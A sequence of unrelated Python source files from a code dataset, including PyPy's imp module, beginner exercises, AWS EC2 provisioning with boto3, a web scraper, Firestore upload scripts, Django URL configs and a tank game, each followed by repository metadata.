def load_module(space, w_name, w_file, w_filename, w_info):
    """Implement imp.load_module(): load a module previously located by
    find_module(), reusing the open file object when one is given."""
    w_suffix, w_filemode, w_modtype = space.unpackiterable(w_info, 3)
    filename = space.fsencode_w(w_filename)
    filemode = space.text_w(w_filemode)
    if space.is_w(w_file, space.w_None):
        stream = None
    else:
        stream = get_file(space, w_file, filename, filemode)
    # Rebuild a FindInfo from the app-level (suffix, mode, type) triple.
    find_info = importing.FindInfo(
        space.int_w(w_modtype),
        filename,
        stream,
        space.text_w(w_suffix),
        filemode)
    return importing.load_module(
        space, w_name, find_info, reuse=True)
def load_source(space, w_modulename, w_filename, w_file=None):
    """Implement imp.load_source(): compile and load a .py file as a module.

    The stream is closed here only when it was opened here (w_file is None).
    """
    filename = space.fsencode_w(w_filename)
    stream = get_file(space, w_file, filename, 'U')
    w_mod = Module(space, w_modulename)
    importing._prepare_module(space, w_mod, filename, None)
    w_mod = importing.load_source_module(
        space, w_modulename, w_mod,
        filename, importing._wrap_readall(space, stream),
        stream.try_to_find_file_descriptor())
    if space.is_none(w_file):
        importing._wrap_close(space, stream)
    return w_mod
@unwrap_spec(filename='fsencode', check_afterwards=int)
def _run_compiled_module(space, w_modulename, filename, w_file, w_module,
                         check_afterwards=False):
    # the function 'imp._run_compiled_module' is a pypy-only extension
    # Reads the pyc header (magic number + timestamp) and then executes the
    # remaining code object into w_module.
    stream = get_file(space, w_file, filename, 'rb')
    magic = importing._wrap_r_long(space, stream)
    timestamp = importing._wrap_r_long(space, stream)
    w_mod = importing.load_compiled_module(
        space, w_modulename, w_module, filename, magic, timestamp,
        importing._wrap_readall(space, stream),
        check_afterwards=check_afterwards)
    if space.is_none(w_file):
        importing._wrap_close(space, stream)
    return w_mod
@unwrap_spec(filename='fsencode')
def load_compiled(space, w_modulename, filename, w_file=None):
    """Implement imp.load_compiled(): load a .pyc file as a module."""
    w_mod = Module(space, w_modulename)
    importing._prepare_module(space, w_mod, filename, None)
    return _run_compiled_module(space, w_modulename, filename, w_file, w_mod,
                                check_afterwards=True)
@unwrap_spec(filename='fsencode')
def load_dynamic(space, w_modulename, filename, w_file=None):
    """Implement imp.load_dynamic(): load a C extension, when supported."""
    if not importing.has_so_extension(space):
        raise oefmt(space.w_ImportError, "Not implemented")
    return importing.load_c_extension(space, filename,
                                      space.text_w(w_modulename))
def new_module(space, w_name):
    """Implement imp.new_module(): a fresh, empty, non-package module."""
    return Module(space, w_name, add_package=False)
def init_builtin(space, w_name):
    """Implement imp.init_builtin().

    Returns None for names that are not built-in modules; refuses to
    initialize a built-in module twice on PyPy.
    """
    name = space.text0_w(w_name)
    if name not in space.builtin_modules:
        return
    if space.finditem(space.sys.get('modules'), w_name) is not None:
        raise oefmt(space.w_ImportError,
                    "cannot initialize a built-in module twice in PyPy")
    return space.getbuiltinmodule(name)
def init_frozen(space, w_name):
    """Implement imp.init_frozen(): PyPy has no frozen modules."""
    return None
def is_builtin(space, w_name):
    """Implement imp.is_builtin(): 1 = built-in, -1 = built-in but already
    initialized, 0 = not built-in."""
    name = space.text0_w(w_name)
    if name not in space.builtin_modules:
        return space.newint(0)
    if space.finditem(space.sys.get('modules'), w_name) is not None:
        return space.newint(-1)   # cannot be initialized again
    return space.newint(1)
def is_frozen(space, w_name):
    """Implement imp.is_frozen(): always False on PyPy."""
    return space.w_False
#__________________________________________________________________
def lock_held(space):
    """Implement imp.lock_held(): True when any thread holds the import
    lock; always False without the thread module."""
    if space.config.objspace.usemodules.thread:
        return space.newbool(importing.getimportlock(space).lock_held_by_anyone())
    else:
        return space.w_False
def acquire_lock(space):
    """Implement imp.acquire_lock(): no-op without the thread module."""
    if space.config.objspace.usemodules.thread:
        importing.getimportlock(space).acquire_lock()
def release_lock(space):
    """Implement imp.release_lock(): no-op without the thread module."""
    if space.config.objspace.usemodules.thread:
        importing.getimportlock(space).release_lock(silent_after_fork=False)
def reinit_lock(space):
    """Implement imp.reinit_lock(): reset the import lock state (no-op
    without the thread module)."""
    if space.config.objspace.usemodules.thread:
        importing.getimportlock(space).reinit_lock()
| mozillazg/pypy | pypy/module/imp/interp_imp.py | interp_imp.py | py | 6,658 | python | en | code | 430 | github-code | 36 |
37077548561 | #!/usr/bin/env python
# coding: utf-8
# 1. Write a Python Program to Find the Factorial of a Number?
# In[7]:
# 1. Factorial of a number.
num=int(input("Ente the no to check its factorial"))
factorial=1
# The three cases (negative / zero / positive) are mutually exclusive, so
# use a single if/elif/else chain instead of three independent ifs.
if num<0:
    print("No foractor for negative no")
elif num == 0:
    print("Factorial of 0 is 1")
else:
    for i in range(1,num+1):
        factorial=i*factorial
    print("The Factorial of",num,"is",factorial)
# 2. Multiplication table of the number, rows 1..10.
num=int(input("Enter the no for multiplication Table"))
# Bug fix: the original looped over range(1, num) (wrong row count, zero rows
# for num <= 1) and printed "num = i X num = num*i", which is not a table row.
for i in range(1,11):
    print(num,"X",i,"=",num*i)
# 3. Fibonacci sequence of nterm terms.
nterm=int(input("Enter How many terms?"))
n1,n2=0,1
count=0
# check the terms is valid
if nterm <=0:
    print("Please enter a positive interger")
elif nterm==1:
    print("Fibbonacci sequence upto",nterm,":")
    print(n1)
else:
    print("Fibonacci sequence:")
    while count < nterm:
        print(n1)
        # Tuple assignment replaces the nth/n1/n2 shuffle.
        n1, n2 = n2, n1 + n2
        count += 1
# 4. Armstrong number check.
num = int(input("Enter the no to check for Armstrong no"))
# Bug fix: the original used "temp = temp/10" (float division), which makes
# "temp % 10" produce fractional junk instead of digits. Also raise each
# digit to the number of digits (as section 5 already does) so the check is
# correct for numbers that do not have exactly 3 digits; for 3-digit input
# the result is unchanged.
order = len(str(num))
total = 0
temp = num
while temp > 0:
    digit = temp % 10
    total = total + digit ** order
    temp //= 10
if num == total:
    print(num,"is the Amstrong no")
else:
    print(num,"is not a Amstrong no")
# 5. Armstrong numbers in the interval [lower, upper].
lower = 100
upper = 2000
for num in range(lower, upper + 1):
    order = len(str(num))
    total = 0
    temp = num
    while temp > 0:
        digit = temp % 10
        total = total + digit ** order
        temp //= 10
    if num == total:
        print(num)
# 6. Sum of the first `num` natural numbers.
# (`total` replaces the original variable `sum`, which shadowed the builtin.)
num = int(input("Enter the number"))
if num < 0:
    print("Enter the Positive no")
else:
    total = 0
    while num > 0:
        total = total + num
        num = num - 1
    print("The sum is: ", total)
# In[ ]:
| ralfsayyed/Inuron_programming_Assingments | Programming Assignment 4.py | Programming Assignment 4.py | py | 2,042 | python | en | code | 0 | github-code | 36 |
16772279994 | import urllib
import boto3
from botocore.exceptions import ClientError
ec2 = boto3.client("ec2")
def get_my_public_ip():
    """Look up this machine's public IP address via https://ident.me,
    print it, and return it as a string."""
    response = urllib.request.urlopen('https://ident.me')
    external_ip = response.read().decode('utf8')
    print('Public ip - ', external_ip)
    return external_ip
def create_key_pair(name):
    """Create an RSA EC2 key pair named `name`, write the private key to
    ./<name>.pem, and return the new KeyPairId (None on ClientError)."""
    try:
        response = ec2.create_key_pair(
            KeyName=name,
            KeyType="rsa",
        )
        with open(f"{name}.pem", "w") as file:
            file.write(response.get("KeyMaterial"))
        print(f"{name} Key has been crated")  # NOTE(review): "crated" typo in user-facing text
        return response.get("KeyPairId")
    except ClientError as e:
        # Best-effort: report the AWS error and fall through to return None.
        print(e)
        return
def create_security_group(client, name, description, vpc_id):
    """Create a security group in `vpc_id` and return its GroupId.

    NOTE(review): an identical create_security_group is re-defined later in
    this file and shadows this one at import time -- consider removing one.
    """
    response = client.create_security_group(
        Description=description,
        GroupName=name,
        VpcId=vpc_id)
    group_id = response.get('GroupId')
    print('Security Group Id - ', group_id)
    return group_id
def add_ssh_access_sg(client, sg_id, ip_address):
    """Allow inbound SSH (TCP 22) to security group `sg_id` from the single
    host `ip_address` (a /32 suffix is appended here)."""
    ip_address = f'{ip_address}/32'
    response = client.authorize_security_group_ingress(
        CidrIp=ip_address,
        FromPort=22,
        GroupId=sg_id,
        IpProtocol='tcp',
        ToPort=22,
    )
    if response.get('Return'):
        print('Rule added successfully')
    else:
        print('Rule was not added')
def add_http_access_sg(client, sg_id):
    """Allow inbound HTTP (TCP 80) to security group `sg_id` from anywhere
    (0.0.0.0/0)."""
    ip_address = '0.0.0.0/0'
    response = client.authorize_security_group_ingress(
        CidrIp=ip_address,
        FromPort=80,
        GroupId=sg_id,
        IpProtocol='tcp',
        ToPort=80,
    )
    if response.get('Return'):
        print('Rule added successfully')
    else:
        print('Rule was not added')
def create_security_group(client, name, description, vpc_id):
    """Create a security group in `vpc_id` and return its GroupId.

    NOTE(review): exact duplicate of the create_security_group defined
    earlier in this file; this second copy is the one bound at import time.
    """
    response = client.create_security_group(
        Description=description,
        GroupName=name,
        VpcId=vpc_id)
    group_id = response.get('GroupId')
    print('Security Group Id - ', group_id)
    return group_id
def create_instance(client, group_id, subnet_id):
    """Launch one t2.micro instance (hard-coded AMI, key pair 'my-key',
    extra 10 GB gp2 volume) in `subnet_id` with security group `group_id`,
    then print each launched InstanceId."""
    response = client.run_instances(
        BlockDeviceMappings=[{'DeviceName': '/dev/sdh',
                              'Ebs': {'DeleteOnTermination': True,
                                      'VolumeSize': 10,
                                      'VolumeType': 'gp2',
                                      'Encrypted': False}
                              }],
        ImageId='ami-0022f774911c1d690',
        InstanceType='t2.micro',
        KeyName='my-key',
        InstanceInitiatedShutdownBehavior='terminate',
        MaxCount=1,
        MinCount=1,
        NetworkInterfaces=[
            {
                'AssociatePublicIpAddress': True,
                'DeleteOnTermination': True,
                'Description': 'string',
                'Groups': [
                    group_id
                ],
                'DeviceIndex':0,
                'SubnetId':subnet_id
            },
        ])
    for instance in response.get('Instances'):
        instance_id = instance.get('InstanceId')
        print('InstanceId - ', instance_id)
def main(vpc_id, subnet_id):
    """End-to-end demo: create a security group, open HTTP to the world and
    SSH to this machine's public IP, then launch an instance."""
    group_id = create_security_group(ec2, 'my', 'grp', vpc_id)
    add_http_access_sg(ec2, group_id)
    my_ip = get_my_public_ip()
    add_ssh_access_sg(ec2, group_id, my_ip)
    create_instance(ec2, group_id, subnet_id)
# Placeholder ids -- replace with a real VPC id and subnet id before running.
if __name__ == '__main__':
    main("vpc-id", "subnet-id")
| annatezelashvili/AWS_Python_Automation | Tasks/Task10-11/create_ec2.py | create_ec2.py | py | 3,423 | python | en | code | 0 | github-code | 36 |
35217252222 | from enum import IntEnum
import requests
from urllib.request import urlopen
import urllib
from selenium import webdriver
from bs4 import BeautifulSoup
import http.client
from openpyxl import Workbook
from openpyxl import load_workbook
from openpyxl.writer.excel import ExcelWriter
from openpyxl.cell.cell import ILLEGAL_CHARACTERS_RE
import json
from functools import reduce
import string
import re
import time
import math
http.client._MAXHEADERS = 1000
def urllib_download(IMAGE_URL, pName):
    """Download IMAGE_URL to '<pName>.jpg' (slashes stripped from the name).

    A browser-like User-Agent is installed because some hosts reject the
    default urllib agent. Failures stay non-fatal (the old code was
    best-effort too), but the bare except that just printed 'no' is narrowed
    and now reports what actually failed.
    """
    try:
        opener = urllib.request.build_opener()
        opener.addheaders = [('User-agent', 'Mozilla/5.0')]
        urllib.request.install_opener(opener)
        target = pName.replace("/", "").replace("\\", "") + '.jpg'
        urllib.request.urlretrieve(IMAGE_URL, target)
    except (urllib.error.URLError, OSError) as exc:
        print('download failed:', IMAGE_URL, exc)
def getNodeText(node):
    """Return the stripped text content of a BeautifulSoup node, or the
    empty string when the node is missing (None)."""
    if node is None:
        return ""
    return node.get_text().strip()
retryCount = 0
def requestJson(url):
    """GET `url` with a browser-like User-Agent and return the parsed JSON
    response body."""
    headers = {
        'Content-Type': 'application/json; charset=utf-8',
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36",
    }
    response = requests.get(url, headers=headers)
    return json.loads(response.text)
def writeExcel(workSheet, headers, rowIndex, info):
    """Write one spreadsheet row: for each header, put info[header] (with
    openpyxl-illegal characters stripped) into row `rowIndex`, or "" when
    the key is missing.

    Bug fix: the original incremented cellIndex inside the try block, so one
    failing cell shifted every later value one column to the left; the
    column counter now always advances. The bare except is also narrowed to
    report which row/cell failed instead of printing only the row number.
    """
    for cellIndex, head in enumerate(headers, start=1):
        try:
            if head in info:
                content = ILLEGAL_CHARACTERS_RE.sub(r'', info[head])
                workSheet.cell(rowIndex, cellIndex).value = content.strip()
            else:
                workSheet.cell(rowIndex, cellIndex).value = ""
        except Exception as exc:
            # Best-effort per cell, matching the original's keep-going style.
            print(rowIndex, cellIndex, exc)
def getProductList(url, products):
    """Fetch one Flintbox listing page at `url` and append one info dict per
    technology to `products`.

    For each listing entry a second request fetches the detail record; the
    *last* include of type 'member' becomes the inventor and the *last*
    include of type 'contact' the licensing contact (the reduce keeps the
    final match).
    """
    print(url)
    data = requestJson(url)
    for pInfoData in data["data"]:
        attrInfo = pInfoData["attributes"]
        uId = attrInfo["uuid"]
        pInfoDetail = requestJson("https://unc.flintbox.com/api/v1/technologies/"+uId+"?organizationId=123&organizationAccessKey=710fd77b-1f7c-41f3-a76e-c5fa43853596")
        includes = pInfoDetail["included"]
        member = reduce(lambda m, cur: cur if cur["type"] == "member" else m, includes, None)
        connector = reduce(lambda m, cur: cur if cur["type"] == "contact" else m, includes, None)
        pInfo = {
            "Title": attrInfo["name"],
            "Published": attrInfo["publishedOn"],
            "Webpage": "https://unc.flintbox.com/technologies/"+uId,
            "Inventor(s)": member["attributes"]["fullName"] if member != None else '',
            "Licensing Contact Person": connector["attributes"]["fullName"] if connector != None else '',
            "Licensing Contact Email": connector["attributes"]["email"] if connector != None else '',
        }
        products.append(pInfo.copy())
# Output workbook and collected rows.
excelFileName="otcuncedu.xlsx"
wb = Workbook()
workSheet = wb.active
products = []
# Column order for the sheet (the last header is Chinese for "remarks").
headers=[
    'Title','Published','Webpage','Inventor(s)','Licensing Contact Person','Licensing Contact Email','备注'
]
# getProductList("https://unc.flintbox.com/api/v1/technologies?organizationId=123&organizationAccessKey=710fd77b-1f7c-41f3-a76e-c5fa43853596&page=1&query=", products)
# Scrape result pages 1..13 into `products`.
for pageIndex in range(1, 14):
    getProductList("https://unc.flintbox.com/api/v1/technologies?organizationId=123&organizationAccessKey=710fd77b-1f7c-41f3-a76e-c5fa43853596&page="+str(pageIndex)+"&query=", products)
# Header row first (row 1), then one row per product starting at row 2.
for index,head in enumerate(headers):
    workSheet.cell(1, index+1).value = head.strip()
for index,p in enumerate(products):
    writeExcel(workSheet, headers, index + 2, p)
print("flish")
wb.save(excelFileName)
71104422184 | #!/usr/bin/env python
# -*- coding=UTF-8 -*-
# Created at Mar 20 19:50 by BlahGeek@Gmail.com
import sys
if hasattr(sys, 'setdefaultencoding'):
sys.setdefaultencoding('UTF-8')
import logging
from datetime import datetime, timedelta
from treehole.renren import RenRen
import os
from treehole.models import ContentModel, BlockIpModel
from ipaddr import IPNetwork, IPAddress
def needRecaptchar(addr, content):
    """Return True when `addr` has already posted more than 2 times in the
    last 24 hours, i.e. a captcha should be required.

    NOTE(review): `content` is accepted but unused here -- confirm whether a
    content-based check was intended.
    """
    if ContentModel.objects.filter(
            ip=addr,
            time__range=(datetime.now()-timedelta(hours=24), \
                datetime.now())
            ).count() > 2:
        return True
    return False
def checkIP(addr):
    """Return True when `addr` may post: it must not appear in BlockIpModel
    and must fall inside one of the whitelisted networks below (several
    public /16-/19 ranges plus loopback and private ranges)."""
    IPS = (
        IPNetwork('59.66.0.0/16'),
        IPNetwork('166.111.0.0/16'),
        IPNetwork('101.5.0.0/16'),
        IPNetwork('219.223.160.0/19'),
        # private address
        IPNetwork('127.0.0.0/8'),
        IPNetwork('10.0.0.0/8'),
        IPNetwork('192.168.0.0/16'),
    )
    # Explicit blocklist wins over the network whitelist.
    if BlockIpModel.objects.filter(ip=addr).count() > 0:
        return False
    return any([IPAddress(addr) in x for x in IPS])
def postRawStatu(text):
    """ Post status without number, without saving to db"""
    r = RenRen()
    r.postStatus(text)
def postStatu(text, ipaddr='127.0.0.1'):
    """ Post status, start with '#xxx', saving to db"""
    # Save first so the total row count (used as the sequence number below)
    # already includes this post.
    new_content = ContentModel(ip=ipaddr,
                               time=datetime.now(),
                               content=text)
    new_content.save()
    number = ContentModel.objects.count()
    text = '#' + str(number) + ' ' + text
    postRawStatu(text)
MSG = {
'IP_NOT_VALID': '不允许您的IP发布',
'CONTENT_TOO_LONG': '状态长度应该在6-100字之间',
'TOO_MANY_TIMES': '每个IP相邻发布时间不能小于30分钟',
'PUBLISH_ERROR': '服务器错误,发布失败',
'RECAPTCHA_INCORRECT': '验证码错误',
'RECAPTCHA_NEEDED': '请输入验证码',
'PUBLISH_OK': '发布成功!'}
COLORS = [
('#1abc9c', '#16a085'),
('#2ecc71', '#27ae60'),
('#3498DB', '#2980B9'),
('#9B59B6', '#8E44AD'),
('#34495E', '#2C3E50'),
('#F1C40F', '#F39C12'),
('#E67E22', '#D35400'),
('#E74C3C', '#C0392B'),
('#95A5A6', '#7F8C8D')
]
| blahgeek/treehole | treehole/utils.py | utils.py | py | 2,317 | python | en | code | 30 | github-code | 36 |
6697035634 | from models.arch.network import Network
from torch.nn import functional as F
import torch
# Build the stage-2 network and load pretrained LOLv1 weights (GPU required).
model = Network(stage=2, depth=8).cuda()
model.set_query_codebook()
model.load_state_dict(torch.load("./pretrained_models/LOLv1.pth"))
# Dummy all-ones input batch: (batch=1, channels=3, 256, 256).
x = torch.ones(1, 3, 256, 256).cuda()
with torch.no_grad():
    # M: positive part of (x - model.thr_conv(x)); presumably a brightness
    # attention mask fed to the BA_* modules below -- TODO confirm.
    M = F.relu(x - model.thr_conv(x))
    f1, f2, f3 = model.encode(x)
    # Vector-quantize the coarsest features against the query codebook.
    fq, distance_map = model.vq_64.forward_with_query(f3, model.query)
    f1_d, f2_d, f3_d = model.decode(fq)
    f1_cat = model.fusion_128([model.up_fusion_2(f3), f2, f2_d, model.down_fusion_local(f1), model.down_fusion_prior(f1_d)])
    f1_f = model.decoder_128_fusion(f1_cat)
    f1_f_wo_ba = f1_f
    f1_f = f1_f + f1_f * model.BA_128(M)
    # NOTE(review): torch.cat with no dim argument (defaults to 0, the batch
    # axis), while the 128-level passed a list to model.fusion_128 -- this
    # asymmetry looks suspicious; confirm the intended fusion here.
    f2_cat = torch.cat([model.up_fusion_3(f1_f), f1, f1_d, model.up_fusion_local(f2), model.up_fusion_prior(f2_d)])
    f2_f = model.decoder_256_fusion(f2_cat)
    f2_f = f2_f + f2_f * model.BA_256(M)
    x_rec = model.conv_fusion_out(f2_f)
# Compare every intermediate tensor against a reference checkpoint dump.
ckpt = torch.load("/home/liuyunlong/project/code/SNR-Aware-Low-Light-Enhance-main/ckpt.pth")
dic = {'feat_256': f1, 'feat_128': f2, 'feat_64': f3, 'feat_q': fq, 'decode_64': f3_d, 'decode_128': f2_d,
       'decode_256': f1_d, 'fusion_128': f1_f, 'fusion_256': f2_f, 'fusion_128_wo_ba': f1_f_wo_ba}
for item in dic:
    print(f"{item}-->{torch.equal(dic[item], ckpt[item])}")
| TaoHuang95/RQ-LLIE | test.py | test.py | py | 1,359 | python | en | code | null | github-code | 36 |
4615311890 | from django.urls import path
from . import views
urlpatterns = [
path('', views.index, name = "home"),
path('shop/', views.shop, name = "shop"),
path('about/', views.about, name = "about"),
path('contact/', views.contact, name = "contact"),
path('faq/', views.faq, name = "faq"),
] | brownlenox/djangostaticfiles | mainapp/urls.py | urls.py | py | 302 | python | en | code | 0 | github-code | 36 |
39647238473 |
from django.urls import path
from .views import newpost_add, post_list, post_detail, post_update,post_delete,about_page, post_like
# Blog routes: list/detail/CRUD views plus the about page and like action.
urlpatterns = [
    path('add', newpost_add, name='add'),
    path('', post_list, name='list'),
    path('detail/<int:id>', post_detail, name='detail'),
    path('update/<int:id>', post_update, name='update'),
    path('delete/<int:id>', post_delete, name='delete'),
    path('about', about_page, name='about'),
    path('like/<int:id>', post_like, name="post_like")
]
7795634258 | # -*- coding: utf-8 -*-
# Author: sunmengxin
# time: 10/17/18
# file: 图的遍历.py
# description:
'''
深度优先遍历和广度优先遍历
'''
# 递归遍历
def DFS(i, n, map, visit):
    """Recursive depth-first walk from node `i` over the n x n adjacency
    matrix `map` (1 marks an edge). Marks nodes in `visit` in place and
    prints each newly reached node followed by a tab; the start node is
    expected to be marked and printed by the caller.
    """
    for neighbor in range(n):
        if map[i][neighbor] == 1 and visit[neighbor] == 0:
            visit[neighbor] = 1
            print(neighbor, end='\t')
            DFS(neighbor, n, map, visit)
# 有问题
# def DFS_stack(i,n,map,visit):
# stack = [i]
# while(len(stack) != 0):
# i = stack[-1]
# for j in range(n):
# if visit[j] == 0 and map[i][j] == 1:
# stack.append(j)
# visit[j] = 1
# print(j,end='\t')
# stack.pop()
def BFS(i, n, map, visit):
    """Breadth-first walk from node `i` over the n x n adjacency matrix
    `map` (1 marks an edge). Marks nodes in `visit` in place and prints
    each newly reached node followed by a tab; the start node is expected
    to be marked and printed by the caller.
    """
    pending = [i]
    while pending:
        current = pending.pop(0)
        for neighbor in range(n):
            if map[current][neighbor] == 1 and visit[neighbor] == 0:
                visit[neighbor] = 1
                print(neighbor, end='\t')
                pending.append(neighbor)
if __name__ == '__main__':
    # First input line: node count n and edge count m; then m lines of
    # 1-based edge pairs "a b".
    n,m = input().split()
    n,m = int(n), int(m)
    # Adjacency matrix: -1 = no edge, 1 = edge (undirected, set both ways).
    map = [[-1 for _ in range(n)] for _ in range(n)]
    visit = [0 for _ in range(n)]
    for _ in range(m):
        a,b = input().split(' ')
        map[int(a)-1][int(b)-1] = 1
        map[int(b)-1][int(a)-1] = 1
    # DFS variant (kept for reference):
    # for i in range(n):
    #     if visit[i] == 0:
    #         visit[i] = 1
    #         print(i,end='\t')
    #         DFS(i,n,map,visit)
    # Traverse every connected component with BFS; each component's start
    # node is marked and printed here before BFS expands it.
    for i in range(n):
        if visit[i] == 0:
            visit[i] = 1
            print(i,end='\t')
            BFS(i,n,map,visit)
'''
9 14
1 2
1 6
2 3
2 7
2 9
3 4
3 9
4 5
4 7
4 8
4 9
5 6
5 8
6 7
'''
| 20130353/Leetcode | graph/图的遍历.py | 图的遍历.py | py | 1,615 | python | en | code | 2 | github-code | 36 |
29271028676 | from tank_class import Tank
import os
# Replay loop: each pass runs one complete three-player game.
choice = 'Y'
while choice == 'Y':
    os.system('clear')
    player1 = input('Name of Player 1: ')
    player2 = input('Name of Player 2: ')
    player3 = input('Name of Player 3: ')
    # Every tank starts with the same stats (20, 50 -- see the Tank class).
    p1, p2, p3 = Tank(player1, 20, 50), Tank(player2, 20, 50), Tank(player3, 20, 50)
    # Tanks are selected at the prompts by their letter key.
    all_tanks = {
        'A' : p1,
        'B' : p2,
        'C' : p3
    }
    alive_tanks = len(all_tanks)
    def check_in_alltanks(tank):
        # Validate a user-entered tank letter: 1 = known tank, 0 = unknown.
        if tank.upper() not in all_tanks.keys():
            print (f'There is no tank named {tank}')
            return 0
        else:
            return 1
    # Round loop: keep firing until only one tank is left alive.
    while alive_tanks > 1:
        print ('\n')
        print ('*' * 45)
        print ('\n')
        for key, value in sorted(all_tanks.items()):
            print (key + '-->' + str(value))
        # The shooter must exist and still be alive.
        first = str(input('Who Fires ? '))
        if check_in_alltanks(first) == 0:
            continue
        first_tank = all_tanks[first.upper()]
        if first_tank.check_if_alive() == 0:
            continue
        # The target must exist, be alive, and differ from the shooter.
        second = str(input(f'{first_tank.tank_name} fires at whom ? '))
        if check_in_alltanks(second) == 0:
            continue
        second_tank = all_tanks[second.upper()]
        if second_tank.check_if_alive() == 0:
            continue
        if first_tank == second_tank:
            print (f"{first_tank.tank_name} can't fire at itself")
            continue
        print ('\n')
        print ('*' * 45)
        print ('\n')
        first_tank.fire_at(second_tank)
        if not second_tank.alive:
            alive_tanks -= 1
    print ('\n')
    print ('*' * 45)
    print ('\n')
    # The sole survivor is announced as the winner.
    for tank in all_tanks.values():
        if tank.alive:
            print (str(tank) + 'is the Winner !!!')
            break
    choice = str(input('Do you want to play again (Y / N) ? ')).upper()
| SubhamK108/Python-3 | Games/The Tank Game/tank_game.py | tank_game.py | py | 1,820 | python | en | code | 0 | github-code | 36 |
74090977062 | import math
from datetime import datetime
import firebase_admin
from firebase_admin import credentials
from firebase_admin import db
from firebase_admin import firestore
import parseIntervalFiles as pif
import parseActivityFiles as paf
hervdir = "C:\\Users\\Ju\\GDrive\\Projects\\HeRV\\"
## Firestore connection parameters
keyfile = hervdir + "Docs\\herv-3c5ea-firebase-adminsdk-99tjk-98193df3d9.json"
databaseURL = 'https://herv-3c5ea.firebaseio.com'
## CSV file reading parameters
source = hervdir + "Data\\Raw\\"
start_dt = datetime(2017, 10, 29)
end_dt = datetime(2018, 11, 1)
def u_ref(db, uid):
    """Return the Firestore document reference for user `uid` (stringified)
    inside the top-level 'users' collection."""
    users = db.collection('users')
    return users.document(str(uid))
def add_sessions(uid, start_dt, end_dt, source, dest):
    """Read the user's sessions from the CSV files under `source` for the
    [start_dt, end_dt] range and write them under users/<uid>/sessions in
    Firestore in a single batch, keyed by the session start time."""
    u_sess = paf.get_sessions(uid, start_dt, end_dt, source, verbose=False)
    print('adding', len(u_sess), 'sessions for user', uid)
    s_ref = u_ref(dest, uid).collection('sessions')
    b = dest.batch()
    for sess in u_sess:
        name = paf.csvu.string_from_time_filename(sess['start'])
        doc = s_ref.document(name)
        b.set(doc, sess)
    b.commit()
def add_intervals(uid, start_dt, end_dt, source, dest):
    """Upload RR intervals for every day in [start_dt, end_dt] for one user."""
    for day in pif.csvu.gendays(start_dt, end_dt):
        add_day_intervals(uid, day, source, dest)
    print ("finished adding intervals for user", uid)
def add_day_intervals(uid, day, source, dest):
    """Upload one day of RR intervals to users/<uid>/rr/<YYYYMMDD>.

    The day document stores only the total count; the per-minute groups go
    into its 'minutes' subcollection, committed in batches (Firestore batch
    writes are limited in size, hence batch()).
    """
    day_rr = pif.get_day_intervals(uid, day, source)
    if len(day_rr) > 0:
        dayname = datetime.strftime(day, "%Y%m%d")
        print(len(day_rr), 'RR intervals in', dayname)
        rr_ref = u_ref(dest, uid).collection('rr')
        rr_ref.document(dayname).set({'rr_count': len(day_rr)})
        mref = rr_ref.document(dayname).collection('minutes')
        for min_batch in batch(group_by_minute(day_rr)):
            print ('adding batch with', len(min_batch), 'minutes')
            gr = dest.batch()
            for (k, v) in min_batch:
                doc = mref.document(k)
                gr.set(doc, v)
            gr.commit()
def batch(d, n=500):
    """Yield the (key, value) pairs of dict `d` in successive lists of at
    most `n` items (500 matches the Firestore batch-write limit used by the
    callers)."""
    items = list(d.items())
    total = len(items)
    start = 0
    while start < total:
        yield items[start:min(start + n, total)]
        start += n
def group_by_minute(dayrr):
    """Group a day's RR samples into {"HHMM": {"S": [interval, ...]}}.

    Each sample is a dict with a 'date' (datetime) and an 'interval'. Only
    minutes/seconds that actually contain samples get keys, and intervals
    keep their order of appearance within a second -- exactly as before.

    This replaces the old 24*60 scan over the whole list (the TODO in the
    original pointed out it could be done without that loop) with a single
    pass; keys are then sorted so iteration order still runs chronologically
    like the old hour/minute/second loops produced.
    """
    grouped = {}
    for sample in dayrr:
        ts = sample['date']
        minute_key = str(ts.hour).zfill(2) + str(ts.minute).zfill(2)
        second_key = str(ts.second)
        minute = grouped.setdefault(minute_key, {})
        minute.setdefault(second_key, []).append(sample['interval'])
    # "HHMM" keys are zero-padded, so lexicographic order is chronological;
    # second keys are unpadded, so sort them numerically.
    return {mk: {sk: grouped[mk][sk] for sk in sorted(grouped[mk], key=int)}
            for mk in sorted(grouped)}
## Initializing a client to communicate with Firestore
cred = credentials.Certificate(keyfile)
default_app = firebase_admin.initialize_app(cred, options={'databaseURL': databaseURL})
client = firestore.client()
print ("Connected to Firestore...")
## for each user id in the database, search for sessions and intervals in csvs
## (document ids under 'users' are parsed as integer user ids)
users = client.collection('users')
userlist = [int(doc.id) for doc in users.get()]
for uid in userlist:
    print("\n\nUSER", uid, "\n\n")
    add_sessions(uid, start_dt, end_dt, source, client)
    add_intervals(uid, start_dt, end_dt, source, client)
| jucc/HeRV_analysis | pipeline/convert_csv_firestore.py | convert_csv_firestore.py | py | 3,459 | python | en | code | 1 | github-code | 36 |
17176681083 | import os
import logging
from logging import handlers
from api.common.jsonFormatter import JsonFormatter
# Logger wrapper that writes records to a JSON-formatted log file.
class Api_logger_json():
    def __init__(self, name):
        """Create (or reuse) the '<name>_json' logger, attaching a
        midnight-rotating JSON file handler at <cwd>/log/app_json.log."""
        super().__init__()
        # Fetch the named logger instance.
        self.log = logging.getLogger(name + "_json")
        if not self.log.hasHandlers():
            # Log level
            self.log.setLevel(logging.INFO)
            # Add the file handler
            # Base path = current working directory
            bath_pash = os.getcwd()
            # Rotate daily at midnight and keep 7 days of backups.
            # When emitting JSON, Japanese text is garbled unless the
            # json_log_formatter library is patched: in that package's
            # __init__.py, add ", ensure_ascii=False" to the return of the
            # "to_json" method. (Locate the library with "pip show <pkg>".)
            file_handler = logging.handlers.TimedRotatingFileHandler(
                filename=bath_pash + '/log/app_json.log', encoding='UTF-8', when='MIDNIGHT', backupCount=7)
            # ensure_ascii=False so Japanese output stays readable.
            formatter = JsonFormatter(json_ensure_ascii=False)
            file_handler.setFormatter(formatter)
            self.log.addHandler(file_handler)
    def getLogger(self):
        """Return the configured logging.Logger instance."""
        return self.log
| war-bonds-rx78/python_flask_db_sample | api/common/logger_json.py | logger_json.py | py | 1,381 | python | ja | code | 0 | github-code | 36 |
8402296505 | from argparse import ArgumentParser
import json, logging
import seeker.podSeeker as Seeker
import judge.simpleJudge as Judge
import updater.simpleUpdater as Updater
class installed_query_info:
    """Record of one installed query: its id plus source and destination
    host ids."""

    def __init__(self, query_id, src_id, dst_id):
